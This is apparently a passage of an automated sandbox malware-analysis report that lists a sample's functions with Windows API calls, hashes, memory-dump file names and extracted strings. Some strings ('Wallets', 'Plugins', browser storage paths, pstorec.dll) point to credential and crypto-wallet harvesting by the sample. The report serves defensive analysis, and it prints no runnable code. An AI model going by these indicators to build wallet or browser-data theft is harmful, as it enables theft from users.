                                                                                                                                                                                                                                                                                • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                Function 0040BC30 Relevance: 58.5, APIs: 14, Strings: 19, Instructions: 704stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                • Opcode ID: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                Function 0041DD60 Relevance: 51.3, APIs: 28, Strings: 1, Instructions: 502filestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                • String ID: UT
                                                                                                                                                                                                                                                                                • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                • Opcode ID: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                Function 0041D3F0 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                Function 0041D850 Relevance: 6.1, APIs: 4, Instructions: 71timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                Function 004011B0 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?,771AF360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                Function 0041A340 Relevance: .4, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
                                                                                                                                                                                                                                                                                Function 0041B0B0 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
